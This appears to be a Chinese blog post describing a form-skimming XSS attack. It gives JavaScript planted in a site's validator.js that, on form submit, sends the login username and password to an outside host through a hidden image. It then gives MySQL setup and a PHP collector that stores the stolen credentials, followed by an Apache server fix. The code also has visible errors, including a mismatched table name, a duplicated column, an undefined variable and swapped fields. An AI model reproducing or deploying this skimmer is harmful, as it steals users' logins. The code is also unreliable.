xss 代码存放处
路径: /Include/Script/validator.js
函数位置: jQuery.fn.checkForm 下面的 form.submit
js代码: document.getElementById('mx').src="http://www.sherpper.com:8680/test.php?"+encodeURI('pass=' + document.getElementById('TextBox2').value)+encodeURI('&user=' + document.getElementById('TextBox1').value);
构造代码的过程中,使用了两个函数 escape 与 encodeURI 。
注意escape组成的url是不能提交成功的,需要使用encodeURI.
html代码:<img src="" id="mx" style="display: none;"/>
安装mysql,并且创建数据库
创建数据库
Create database test;
创建表
create table login
(
id int not null AUTO_INCREMENT,
id int not null AUTO_INCREMENT,
username char(15) NOT NULL,
password char(15) NOT NULL,
PRIMARY KEY(id)
)ENGINE = InnoDB;
想看之前创建的表
show create table xss;
php 后台接收代码
<?php
session_start();
$_SESSION['attempt'] = isset($_SESSION['attempt'])?$_SESSION['attempt']:0;
$_SESSION['attempt'] += 1;
if ($_SESSION['attempt'] >= 100) {
die("Too Frequent");
}
$mysqli = new mysqli("localhost", "root", "123456", "evil");
if ($mysqli->connect_errno) {
echo "Failed to connect to MySQL: (" . $mysqli->connect_errno . ") " . $mysqli->connect_error;
}
$passwd = $_GET['pass'];
$users = $_GET['user'];
$time = date("Y-m-d H:i:s", time());
$items = explode(";", $content);
$js = '';
foreach ($items as $item) {
$js .= ("document.cookie='".trim($item)."';");
}
echo 'js: ' , $js , '<br>' , 'time: ' , $time , '<br>';
if ($stmt = $mysqli->prepare("insert into xss(username, password, time, js) values (?, ?, ?, ?)")) {
$stmt->bind_param('ssss', $passwd, $users, $time, $js);
$result = $stmt->execute();
if ($result) {
echo "Collected Your Cookie <br>" ;
}
}
echo 'password: ', $passwd, '<br>', 'username: ', $users;
?>
这次在linux部署LAMP服务器时遇到一些小问题:环境: debian7(raspberry pi) apache2 PHP mysql
配置完port.conf后,重启出现问题:
How to fix Apache2 could not reliably determine the server’s fully qualified domain name
下面是解决方法,附上链接
echo "ServerName localhost" | sudo tee /etc/apache2/conf.d/fqdn
没有评论:
发表评论